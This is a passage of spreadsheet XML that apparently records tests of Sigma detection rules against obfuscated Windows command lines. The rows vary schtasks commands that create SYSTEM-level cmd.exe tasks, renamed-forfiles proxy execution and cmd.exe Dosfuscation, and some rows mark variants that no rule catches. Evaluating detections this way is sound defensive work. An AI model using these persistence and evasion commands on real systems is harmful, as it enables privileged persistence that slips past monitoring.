          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1564" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1564" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create -"TN" "SystemTask1" /TR "cmd.exe" -"SC" ONSTART -"RU" "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1564" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1564" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1564" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1564" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1564" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1564" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1565" ht="15.75" customHeight="1" s="42">
      <c r="A1565" s="43" t="n"/>
      <c r="B1565" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1565" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1565" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1565" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /TN "SystemTask1" /TR "cmd.exe" -"SC" ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1565" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1565" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1565" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1565" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1565" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1565" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1566" ht="15.75" customHeight="1" s="42">
      <c r="A1566" s="43" t="n"/>
      <c r="B1566" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1566" s="43" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1566" s="43" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1566" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATE /tN "SystemTask1" /TR "cmd.exe" /Sc ONSTART /rU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1566" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1566" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1566" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1566" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1566" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1567" ht="15.75" customHeight="1" s="42">
      <c r="A1567" s="44" t="n"/>
      <c r="B1567" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1567" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1567" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1567" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /Tn "SystemTask1" /"TR" "cmd.exe" /SC ONSTART /Ru "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1567" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1567" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1567" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1567" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1567" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1567" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1568" ht="15.75" customHeight="1" s="42">
      <c r="A1568" s="44" t="n"/>
      <c r="B1568" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1568" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1568" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1568" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATe /TN "SystemTask1" -"TR" "cmd.exe" /Sc ONSTART /"RU" "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1568" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1568" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1568" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1568" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1568" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1568" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1569" ht="15.75" customHeight="1" s="42">
      <c r="A1569" s="43" t="n"/>
      <c r="B1569" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1569" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1569" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1569" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CreatE /TN "SystemTask1" /TR "cmd.exe" /sc ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1569" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1569" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1569" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1569" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1569" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1569" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1570" ht="15.75" customHeight="1" s="42">
      <c r="A1570" s="43" t="n"/>
      <c r="B1570" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1570" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1570" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1570" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEaTe /tn "SystemTask1" -"TR" "cmd.exe" -"SC" ONSTART -"RU" "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1570" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1570" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1570" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1570" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1570" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1570" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1571" ht="15.75" customHeight="1" s="42">
      <c r="A1571" s="43" t="n"/>
      <c r="B1571" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1571" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1571" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1571" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SystemTask3" /tr "cmd.exe" /sc daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F1571" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1571" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1571" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1571" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1571" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1571" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1572" ht="15.75" customHeight="1" s="42">
      <c r="A1572" s="43" t="n"/>
      <c r="B1572" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1572" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1572" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1572" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /TN "SystemTask3" /"tr" "cmd.exe" -"sc" daily -"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F1572" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1572" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1572" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1572" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1572" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1572" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1573" ht="15.75" customHeight="1" s="42">
      <c r="A1573" s="43" t="n"/>
      <c r="B1573" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1573" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1573" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1573" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREATE /"tn" "SystemTask3" /TR "cmd.exe" /sC daily /RU SYSTEM</t>
        </is>
      </c>
      <c r="F1573" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1573" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1573" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1573" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1573" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1573" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1574" ht="15.75" customHeight="1" s="42">
      <c r="A1574" s="43" t="n"/>
      <c r="B1574" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1574" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1574" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1574" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /Tn "SystemTask3" /tr "cmd.exe" /sc daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F1574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1574" s="44" t="n"/>
      <c r="J1574" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1574" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1575" ht="15.75" customHeight="1" s="42">
      <c r="A1575" s="43" t="n"/>
      <c r="B1575" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1575" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1575" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1575" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /TN "SystemTask3" -"tr" "cmd.exe" /sc daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F1575" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1575" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1575" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1575" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1575" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1575" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1576" ht="15.75" customHeight="1" s="42">
      <c r="A1576" s="43" t="n"/>
      <c r="B1576" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1576" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1576" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1576" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SystemTask3" /"tr" "cmd.exe" -"sc" daily -"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F1576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1576" s="44" t="n"/>
      <c r="J1576" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1576" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1577" ht="15.75" customHeight="1" s="42">
      <c r="A1577" s="43" t="n"/>
      <c r="B1577" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1577" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1577" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1577" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /creaTe /tn "SystemTask3" /"tr" "cmd.exe" /sC daily /Ru SYSTEM</t>
        </is>
      </c>
      <c r="F1577" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1577" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1577" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1577" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1578" ht="15.75" customHeight="1" s="42">
      <c r="A1578" s="43" t="n"/>
      <c r="B1578" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1578" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1578" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1578" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SystemTask3" /tr "cmd.exe" -"sc" daily /"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F1578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1578" s="44" t="n"/>
      <c r="J1578" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1578" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1579" ht="15.75" customHeight="1" s="42">
      <c r="A1579" s="43" t="n"/>
      <c r="B1579" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1579" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1579" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1579" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "SystemTask3" /"tr" "cmd.exe" -"sc" daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F1579" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1579" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1579" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1579" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1579" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1579" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1580" ht="15.75" customHeight="1" s="42">
      <c r="A1580" s="43" t="n"/>
      <c r="B1580" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1580" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1580" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1580" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SystemTask3" /"tr" "cmd.exe" /sc daily /Ru SYSTEM</t>
        </is>
      </c>
      <c r="F1580" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1580" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1580" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1580" s="44" t="n"/>
      <c r="J1580" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1580" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1581" ht="15.75" customHeight="1" s="42">
      <c r="A1581" s="43" t="n"/>
      <c r="B1581" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1581" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1581" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1581" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATE /Tn "SystemTask3" /"tr" "cmd.exe" /Sc daily /RU SYSTEM</t>
        </is>
      </c>
      <c r="F1581" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1581" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1581" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1581" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1581" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1581" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1582" ht="15.75" customHeight="1" s="42">
      <c r="A1582" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1582" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dosfuscation</t>
        </is>
      </c>
      <c r="C1582" s="44" t="inlineStr">
        <is>
          <t>Potential Dosfuscation Activity</t>
        </is>
      </c>
      <c r="D1582" s="44" t="inlineStr">
        <is>
          <t>a77c1610-fc73-4019-8e29-0f51efc04a51</t>
        </is>
      </c>
      <c r="E1582" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "FOR /F "tokens=1" %A IN ('echo set') DO %A MYVAR=value"</t>
        </is>
      </c>
      <c r="F1582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1582" s="43" t="n"/>
      <c r="J1582" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1582" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1583" ht="15.75" customHeight="1" s="42">
      <c r="A1583" s="43" t="n"/>
      <c r="B1583" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1583" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1583" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1583" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe /p c:\windows\system32 /m notepad.exe /c "calc.exe"</t>
        </is>
      </c>
      <c r="F1583" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1583" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1583" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1583" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution (9aa5106d-bce3-4b13-86df-3a20f1d5cf0b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1583" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1583" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1584" ht="15.75" customHeight="1" s="42">
      <c r="A1584" s="43" t="n"/>
      <c r="B1584" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1584" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1584" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1584" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe /p c:\windows\system32 /M notepad.exe /c "calc.exe"</t>
        </is>
      </c>
      <c r="F1584" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1584" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution (9aa5106d-bce3-4b13-86df-3a20f1d5cf0b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1584" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1585" ht="15.75" customHeight="1" s="42">
      <c r="A1585" s="43" t="n"/>
      <c r="B1585" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1585" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1585" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1585" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe -"p" c:\windows\system32 /m notepad.exe /c "calc.exe"</t>
        </is>
      </c>
      <c r="F1585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1585" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1585" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1585" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution (9aa5106d-bce3-4b13-86df-3a20f1d5cf0b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1585" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1585" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1586" ht="15.75" customHeight="1" s="42">
      <c r="A1586" s="43" t="n"/>
      <c r="B1586" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1586" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1586" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1586" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe /p c:\windows\system32 /m notepad.exe /"c" "calc.exe"</t>
        </is>
      </c>
      <c r="F1586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1586" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1586" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1586" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1586" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1587" ht="15.75" customHeight="1" s="42">
      <c r="A1587" s="43" t="n"/>
      <c r="B1587" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1587" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1587" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1587" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe /p c:\windows\system32 -"m" notepad.exe /C "calc.exe"</t>
        </is>
      </c>
      <c r="F1587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1587" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1587" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1587" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution (9aa5106d-bce3-4b13-86df-3a20f1d5cf0b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1587" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1587" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1588" ht="15.75" customHeight="1" s="42">
      <c r="A1588" s="43" t="n"/>
      <c r="B1588" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1588" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1588" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1588" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe -"p" c:\windows\system32 /"m" notepad.exe /C "calc.exe"</t>
        </is>
      </c>
      <c r="F1588" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1588" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1588" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1588" s="43" t="inlineStr">
        <is>
